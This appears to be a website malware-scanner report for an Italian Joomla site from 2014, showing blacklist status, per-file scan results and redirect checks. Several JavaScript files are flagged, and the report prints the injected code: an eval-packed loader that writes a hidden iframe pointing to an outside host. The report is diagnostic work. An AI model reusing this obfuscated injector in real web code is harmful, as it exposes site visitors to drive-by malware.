Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bricomatt.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bricomatt.it/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bricomatt.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:27 GMT Location: http://www.bricomatt.it/ Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/ | 200 OK Content-Length: 70889 Content-Type: text/html | clean |
http://www.bricomatt.it/media/system/js/mootools-core.js | 200 OK Content-Length: 96790 Content-Type: application/javascript | clean |
http://bricomatt.it/media/system/js/core.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:30 GMT Location: http://www.bricomatt.it/media/system/js/core.js Server: Apache Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/core.js | 200 OK Content-Length: 5211 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if("undefined"===typeof Joomla)var Joomla={};Joomla.editors={};Joomla.editors.instances={};Joomla.submitform=function(a,b){if("undefined"===typeof b&&(b=document.getElementById("adminForm"),!b))b=document.adminForm;if("undefined"!==typeof a&&''!==a)b.task.value=a;if("function"==typeof b.onsubmit)b.onsubmit();"function"==typeof b.fireEvent&&b.fireEvent("submit");b.submit()};Joomla.submitbutton=function(a){Joomla.submitform(a)}; Joomla.JText={strings:{},_:function(a,b){ <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://bricomatt.it/media/system/js/modal.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:31 GMT Location: http://www.bricomatt.it/media/system/js/modal.js Server: Apache Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/modal.js | 200 OK Content-Length: 10159 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var SqueezeBox={presets:{onOpen:function(){},onClose:function(){},onUpdate:function(){},onResize:function(){},onMove:function(){},onShow:function(){},onHide:function(){},size:{x:600,y:450},sizeLoading:{x:200,y:150},marginInner:{x:20,y:20},marginImage:{x:50,y:75},handler:!1,target:null,closable:!0,closeBtn:!0,zIndex:65555,overlayOpacity:0.7,classWindow:"",classOverlay:"",overlayFx:{},resizeFx:{},contentFx:{},parse:!1,parseSecure:!1,shadow:!0,overlay:!0,document:null,ajaxOptions:{}},initialize:fun <!-- . --> Antivirus reports:
| ||
http://bricomatt.it//ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:31 GMT Location: http://www.bricomatt.it//ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js/ Server: Apache Content-Length: 288 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it//ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js/ | 404 Not Found Content-Length: 253 Content-Type: text/html | clean |
http://www.bricomatt.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://bricomatt.it/media/k2/assets/js/k2.noconflict.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:31 GMT Location: http://www.bricomatt.it/media/k2/assets/js/k2.noconflict.js Server: Apache Content-Length: 267 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/k2/assets/js/k2.noconflict.js | 200 OK Content-Length: 347 Content-Type: application/javascript | clean |
http://bricomatt.it/components/com_k2/js/k2.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:32 GMT Location: http://www.bricomatt.it/components/com_k2/js/k2.js Server: Apache Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/components/com_k2/js/k2.js | 200 OK Content-Length: 7750 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var $K2 = jQuery.noConflict(); $K2(document).ready(function(){ $K2('#comment-form').submit(function(event){ event.preventDefault(); $K2('#formLog').empty().addClass('formLogLoading'); $K2.ajax({ url: $K2('#comment-form').attr('action'), type: 'post', dataType: 'json', data: $K2('#comment-form').serialize(), success: function(response){ $K2('#formLog').removeClass('formLogLoading').html(response.message); if(typeof(Rec var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5:<!-- . --> Antivirus reports:
| ||
http://bricomatt.it/media/system/js/caption.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:33 GMT Location: http://www.bricomatt.it/media/system/js/caption.js Server: Apache Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/caption.js | 200 OK Content-Length: 1156 Content-Type: application/javascript | clean |
http://bricomatt.it/media/system/js/mootools-more.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:33 GMT Location: http://www.bricomatt.it/media/system/js/mootools-more.js Server: Apache Content-Length: 264 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/mootools-more.js | 200 OK Content-Length: 238759 Content-Type: application/javascript | clean |
http://www.bricomatt.it/templates/gk_twn2/js/menu.gkmenu.js | 200 OK Content-Length: 4618 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('load', function() { if(document.id('gkMainMenu')) { document.getElements('#gkMainMenu ul li span').each(function(el) { el.setProperty('onmouseover', ''); }); document.getElements('#gkMainMenu ul li a').each(function(el) { el.setProperty('onmouseover', ''); if(el.getParent().hasClass('haschild') && document.getElement('body').getProperty('data-tablet') != null) { } } }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://www.bricomatt.it/templates/gk_twn2/js/gk.scripts.js | 200 OK Content-Length: 5198 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function(){ new SmoothScroll(); if(document.id('gkStyleArea')){ $$('#gkStyleArea a').each(function(element,index){ element.addEvent('click',function(e){ e.stop(); changeStyle(index+1); }); }); } if(document.id('gkTools') && document.id('gkComponentWrap')) { var current_fs = 100; var content_fx = new Fx.Tween(document.id('gkComponentWrap'), { property: 'font-size', unit }<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://bricomatt.it/media/system/js/validate.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:35 GMT Location: http://www.bricomatt.it/media/system/js/validate.js Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/validate.js | 200 OK Content-Length: 3350 Content-Type: application/javascript | clean |
http://www.google.com/recaptcha/api/js/recaptcha_ajax.js | 200 OK Content-Length: 115874 Content-Type: text/javascript | clean |
http://www.bricomatt.it/modules/mod_news_pro_gk4/interface/scripts/engine.js | 200 OK Content-Length: 8034 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bricomatt.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 20 Sep 2014 18:07:27 GMT
Location: http://www.bricomatt.it/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
GET / HTTP/1.1
Host: bricomatt.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 20 Sep 2014 18:07:27 GMT
Location: http://www.bricomatt.it/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bricomatt.it
Referer: http://www.google.com/search?q=bricomatt.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bricomatt.it
Referer: http://www.google.com/search?q=bricomatt.it
Result:
The result is similar to the first query. There are no suspicious redirects found.